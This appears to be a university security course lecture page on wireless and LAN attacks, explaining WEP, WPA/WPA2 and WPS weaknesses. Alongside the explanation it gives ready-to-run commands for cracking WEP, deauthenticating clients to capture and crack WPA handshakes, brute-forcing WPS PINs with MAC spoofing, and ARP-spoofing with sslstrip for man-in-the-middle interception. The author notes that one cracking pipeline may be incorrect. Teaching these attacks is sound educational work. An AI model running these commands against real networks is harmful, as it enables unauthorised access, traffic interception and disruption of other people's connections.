1 LanHacking

1.1 Tools for the day:

1.1.1 1. You

a https://en.wikipedia.org/wiki/Script_kiddie is not the following…

1.1.2 2. Hardware

1.1.3 3. Software

There may be a mysterious new WiFi network in class today…

1.2 Wifi management and observation


# view the new usb nic you just plugged in

# view cards
ip link
iw dev
sudo airmon-ng

# view ip address
ip -color=always address
ip -c add
ip a

# default gateway
ip route

# change mac address (optional)
# wlan0 replace with your card name
sudo ip link set down dev <interface>
sudo ip link set down dev wlan0

sudo ip link set dev wlan0 address <interface-MAC>
sudo ip link set dev wlan0 address AA:BB:CC:DD:EE:FF

sudo ip link set up dev <interface>
sudo ip link set up dev wlan0

# put card in monitor / promiscuous mode
sudo airmon-ng start <interface>
sudo airmon-ng start wlan0

# or
sudo ip link set <interface> down
sudo ip link set wlan0 down

sudo iw dev <interface> set type monitor
sudo iw dev wlan0 set type monitor

sudo ip link set <interface> up
sudo ip link set wlan0 up

# check out your "new" promiscuous interface
ip link
iw dev
sudo airmon-ng

# watch local traffic
sudo airodump-ng <new-monitor-interface>
sudo airodump-ng wlan0mon
# ctrl-c to stop (it leaves graph on output)

# or watch with wireshark (assumes you put card in monitor mode).
sudo wireshark &

1.3 Attacks

1.3.1 Wired versus wireless


1.3.2 Locations and types of attack


1.4 What are BSSID, SSID, ESSID?

Each basic service set has its own unique identifier, a BSSID, which is a unique 48-bit identifier, that follows MAC address conventions,
e.g., 12-34-56-78-9A-BC

Chosen 0-32 bit name for BSS.
The SSID is broadcast by stations in beacon packets to announce the presence of a network.
e.g., MST-WPA-N

Chosen name for ESS,
e.g., MST-WPA-N

1.5 The first generation: Wired Equivalent Privacy (WEP)


It covers:
* C: encrypted
* I: data integrity check
* A: passphrase authentication

1.5.1 WEP setup

During configuration, pre-setup the AP and Node (you) with a pre-shared secret key.

1.5.2 WEP authentication

A standard challenge-response using a pre-sharked key.

WEP authentication
1. A wireless host requests authentication by an access point.
2. The access point responds to the authentication request with a 128-byte nonce value.
3. The wireless host encrypts the nonce using the symmetric key that it pre-shared with the access point.
4. The access point decrypts the host-encrypted nonce.

1.5.3 WEP Encryption

Recall from the ../../Security/Content/SymmetricStream.html day: WEP RC4 encryption

LanHacking/wep_fig2.png WEP RC4 decryption

LanHacking/wep_fig3.png WEP RC4 summary

  1. First a 4-byte cyclic redundancy check value is computed for the data payload.
  2. Key value (in this case, the 64-bit (KS, IV) key), 40 bits shared, IV is 24 bits
  3. RC4 algorithm produces a stream of key values, k1IV , k2IV , k3IV, . . . that are used to encrypt the data and CRC value in a frame. Encryption and Decryption

ci = di \(\oplus\) kiIV

di = ci \(\oplus\) kiIV

1.5.4 WEP Vulnerabilities Flaw 1: keystream re-use More flaws

Conclusion: don’t use WEP unless you’re running an obvious honeypot… Practical attack methods


# capture the traffic
airodump-ng --bssid <target-BSSID> --channel <target-channel> -w <output-file> --ivs <wlan-mon-interface>

# generate some traffic by running these both for a while
# optional, but traffic is needed if user is not generating a lot already
aireplay-ng --fakeauth 0 -a <ap-BSSID> <wlan-mon-interface>
aireplay-ng --arpreplay -b <ap-BSSID> <wlan-mon-interface>

# Bust a cap in that pass, word.
aircrack-ng <saved-file.ivs>

# or
aircrack-ng -b <BSSID> <saved-file.ivs>

This attack does work reasonably quickly and reliably.
WEP APs have been decreasing in number and have been largely phased out, so it’s less relevant in the real world.

1.6 The next generations: WPA and WPA2


1.6.1 Authentication

  1. WPA-personal:
  2. WPA-enterprise:
  3. Wi-Fi protected Setup (WPS): Authentication (personal PSK mode)


If you’d like to see actual implementation of the attack, one place to start is coWPAtty sources, they’re relatively small, self-contained, and easy to read:
* https://github.com/joswr1ght/cowpatty
* http://www.willhackforsushi.com/code/cowpatty/4.6/cowpatty-4.6.tgz
* https://sourceforge.net/projects/cowpatty/
* https://tools.kali.org/wireless-attacks/cowpatty

1.6.2 Encryption

One can choose between:

TKIP (Temporal Key Integrity Protocol):
* The RC4 stream cipher is used with a 128-bit per-packet key, meaning that it dynamically generates a new key for each packet.
* This is one option used by WPA.
CCMP (CTR mode with CBC-MAC Protocol, AES):
* This is one protocol used by WPA2
* Based on the Advanced Encryption Standard (AES) cipher, along with strong message authenticity and integrity checking.
* It is significantly stronger in protection for both privacy and integrity than the RC4-based TKIP that is used by WPA.
* Informal names are “AES” and “AES-CCMP

Note: in your old router, choose the AES option exclusively over TKIP, if you can. AES: CTR mode (nonce is IV here)

LanHacking/CTR-decr.png CBC-MAC

To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector.
Blocks m1 || m2 ||… || mx using a secret key k, and a block cipher E:

1.6.3 Vulnerabilities come in two main categories

  1. Exploits on proper functionality which has been mis-managed by the user
  2. Actual flaws/bugs to be exploited Attack on WPA/WPA2 weak passwords


1. Kick someone off their own AP / WiFi router.
2. Capture the traffic when they perform their 4-way handshake, which contains a shared secret capable of reproducing the password!
3. Crack the “hashed” secret offline using a dictionary, rainbow table, or brute force.


# Setup and choose network

# put wlan0 in monitor mode
# (if it is not already, from above demo)
sudo airmon-ng start <interface>
sudo airmon-ng start wlan0

# check out networks
# (if you have not already, from above demo)
sudo airodump-ng <new-monitor-interface>
sudo airodump-ng wlan0mon

# Capture traffic on network of interest
sudo airodump-ng --channel <ap-channel> --bssid <ap-BSSID> --write <capfilenamebase> <new-monitor-interface>
sudo airodump-ng --channel 6 --bssid 00:11:50:73:0D:24 --write capfile wlan0mon

# In a new terminal:
# Deauthenticate (kick off) -- these are ALTERNATIVES, but you can do both in different terminals at the same time
sudo aireplay-ng --deauth <count> -a <ap-BSSID> <new-monitor-interface>
sudo aireplay-ng --deauth 20 -a 00:11:50:73:0D:24 wlan0mon

# or (in Debian repos, but not Fedora)
sudo mdk3 <new-monitor-interface> d <ap-BSSID> -c <channel>
sudo mdk3 wlan0mon d 00:07:26:47:B0:35 -c 6

# to stop the airodump capture (it will save the recorded capfile.cap)
# ctrl-c
# To view wireless protocols
sudo wireshark <captured-file.cap>
sudo wireshark capfile.cap
# sort right column, look for authentication frames and frame type: key (4 frames)

# Crack capfile offline -- these are ALTERNATIVES below

# dictionary here (there are other brute force options below)
sudo aircrack-ng --bssid <ap-BSSID> <capfile> -w <dictionary-file>
sudo aircrack-ng --bssid 00:11:50:73:0D:24 capfile.cap -w /usr/share/john/password.lst

# or
# (not sure if these two below are correct):
sudo john --stdout --incremental:all | aircrack-ng --bssid <ap-BSSID> -w <capfile>
sudo john --stdout --incremental:all | aircrack-ng --bssid 00:11:50:73:0D:24 -w capfile.cap

# or
sudo cowpatty -r capfile.cap d dictionary_hash s dictionary

For more details on some of these attacks, see the https://acmsigsec.mst.edu/ Wifi Workshop document:

Ask in class:
* About how many on average need to be tried?
* Is this “online” or “offline” cracking?
* How long might such an attack take?
* What are some defenses?

1.7 Wifi Protected Setup (WPS)


Ask in class:
* About how many on average need to be tried?
* Is this “online” or “offline” cracking?
* How long might such an attack take?
* What are some defenses?

1.7.1 Wifi Protected Setup attack software

* online/realtime attack
* https://code.google.com/archive/p/reaver-wps/wikis/README.wiki

* online/real-time attack
* https://null-byte.wonderhowto.com/how-to/hack-wi-fi-breaking-wps-pin-get-password-with-bully-0158819/
* https://tools.kali.org/wireless-attacks/bully
* Newer, redundant with Reaver, generally not as good as Reaver

* offline attack specific to some vendors
* in combination with Reaver or Bully, can speed up some attacks, and perform a newer class of related attack.
* https://github.com/wiire-a/pixiewps

1.7.2 Example bash commands


# put wlan0 in monitor mode
# (if it is not already, from above demo)
sudo airmon-ng start <interface>
sudo airmon-ng start wlan0

# to see WPS networks
sudo airodump-ng --wps <new-monitor-interface>
sudo airodump-ng --wps wlan0mon

# to see WPS networks only
# Note: this is is the Debian repos, but not in Fedora basic
sudo wash --interface <new-monitor-interface>
sudo wash --interface wlan0mon

# the atttack
sudo reaver --interface=<new-monitor-interface> --bssid=<ap-BSSID>
sudo reaver --interface=wlan0mon --bssid=00:11:50:73:0D:24

# If you get rate-limited, there are many further options

# You can also change your MAC first,
# but it needs to be specified in Reaver execution as a flag.
# Note: this method works better than macchanger, for reaver.
# Note: start here without being in monitor mode already:
sudo ip link set down dev <interface>
sudo ip link set down dev wlan0

sudo ip link set dev <interface> address <desired-MAC-address>
sudo ip link set dev wlan0 address 00:BA:AD:BE:EF:69

sudo ip link set up dev <interface>
sudo ip link set up dev wlan0

sudo airmon-ng start <interface>
sudo airmon-ng start wlan0

sudo reaver --interface=<new-monitor-interface> --bssid=<ap-BSSID> -vv --mac=<faked-MAC-above>
sudo reaver --interface=wlan0mon --bssid=00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

* Reaver is finicky, and may require adjusting delay for router timeouts, nacks, acks, and other parameters before it “gets along” with the AP you are attacking.
* Many APs rate-limit the number of PINs that can be tried, either in a time window, or total, before some reset;
* AP limiting procedures are variable, and you may have to explore them interactively to determine what works best for a given AP.
* On newer routers that rate limit, this attack may take quite some time (1 month or more).

1.8 ARP spoofing / poisoning


Once you are connected to the network, either switched/wired or wireless, use this to implement a man-in-the-middle (MiTM attack).


1.8.1 Practical tools for attack



# put your machine in forward mode (just a 1-bit text file)
echo "1" > /proc/sys/net/ipv4/ip_forward
# or
sysctl -w net.ipv4.ip_forward=1

# list everyone on network (Fedora does not have in repos?)

# show your default gateway
ip route

# show arp cache
ip neigh show

# attack from victim (Fedora does not have in repos?)
arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]

# attack from router
arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]

# wireshark, sslstrip, etc.,
sslstrip -w filename.txt -l 1000

The end!